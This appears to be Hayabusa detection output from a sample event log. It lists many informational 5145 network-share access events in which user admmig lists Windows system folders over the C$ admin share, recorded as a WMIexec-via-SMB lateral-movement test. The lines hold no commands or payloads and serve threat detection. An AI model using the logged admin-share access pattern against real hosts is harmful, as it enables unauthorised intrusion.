+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs\DevInvCache  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\apppatch64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\Custom  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\Custom\Custom64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\en-US  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppReadiness  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
